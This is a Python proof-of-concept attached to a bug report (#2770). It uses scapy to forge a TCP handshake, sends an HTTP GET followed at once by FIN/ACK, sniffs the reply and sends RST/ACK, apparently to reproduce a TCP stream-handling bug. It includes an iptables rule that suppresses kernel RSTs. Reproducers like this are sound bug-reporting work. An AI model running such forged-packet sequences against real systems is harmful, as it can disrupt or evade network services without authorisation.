Bug #2770 » poc.py

Alexey Vishnyakov, 01/14/2019 11:51 AM

 
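import random
import sys

from scapy.all import *

'''
Note: linux might send an RST for forged SYN packets. Disable it by executing:
#> iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <src_ip> -j DROP
'''

# Target of the forged connection plus a random ephemeral source port and
# initial sequence number for this run.
dst = "192.168.56.1"
dport = 8080
sport = random.randint(1024, 65535)
seq = random.randint(1, 50000)

pkt = IP(dst=dst)

# 3whs start

# SYN
pkt_syn = pkt / TCP(sport=sport, dport=dport, seq=seq, flags='S')

# SYN/ACK -- sr1() returns None when nothing comes back before the timeout,
# and a non-TCP reply (e.g. an ICMP unreachable) has no .ack/.seq fields, so
# stop here instead of failing with an AttributeError further down.
pkt_syn_ack = sr1(pkt_syn, verbose=0, timeout=5)
if pkt_syn_ack is None or not pkt_syn_ack.haslayer(TCP):
    print('No SYN/ACK received from {}:{}'.format(dst, dport))
    sys.exit(1)

# ACK
seq += 1
if pkt_syn_ack[TCP].ack != seq:
    print('Bad ACK number !')

ack = pkt_syn_ack[TCP].seq + 1
pkt_ack = pkt / TCP(sport=sport, dport=dport, seq=seq, ack=ack, flags='A')
send(pkt_ack)

# 3whs end

# Request bytes are unchanged from the original PoC; the trailing '\r\n'
# element produces the empty line that terminates the header block.
http_req = '\r\n'.join([
    'GET /index.html HTTP/1.1',
    'Host: {}'.format(dst),
    'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language: en-US,en;q=0.5',
    'Accept-Encoding: gzip, deflate',
    'Connection: keep-alive',
    '\r\n',
])

pkt_http_req = pkt / TCP(sport=sport, dport=dport, seq=seq, ack=ack, flags='AP') / http_req
# The FIN's sequence number sits right after the last request byte.
pkt_fin_ack = pkt / TCP(sport=sport, dport=dport, seq=seq + len(http_req), ack=ack, flags='AF')

# Send GET request
send(pkt_http_req)
# Send FIN/ACK just after GET request
send(pkt_fin_ack)

# Receive GET answer. Restrict the capture to segments from the target's
# port back to our port that actually carry data; a bare 'tcp' filter would
# accept the server's empty ACK (or any unrelated TCP packet on the
# interface) as the response.
resp_filter = 'tcp and src host {} and src port {} and dst port {}'.format(dst, dport, sport)
pkt_http_resp = sniff(filter=resp_filter, lfilter=lambda p: p.haslayer(Raw),
                      count=1, timeout=10)
if not pkt_http_resp:
    print('No HTTP response received from {}:{}'.format(dst, dport))
    sys.exit(1)

# Read the TCP payload from the parsed layers rather than slicing the raw IP
# packet at a fixed offset: '[40:]' is only right when neither header
# carries options.
resp_body = pkt_http_resp[0][Raw].load
print(resp_body)

# Send RST/ACK after response: +1 accounts for the FIN we sent, and the ACK
# number must cover the response bytes just received.
pkt_rst_ack = pkt / TCP(sport=sport, dport=dport, seq=seq + len(http_req) + 1,
                        ack=ack + len(resp_body), flags='AR')
send(pkt_rst_ack)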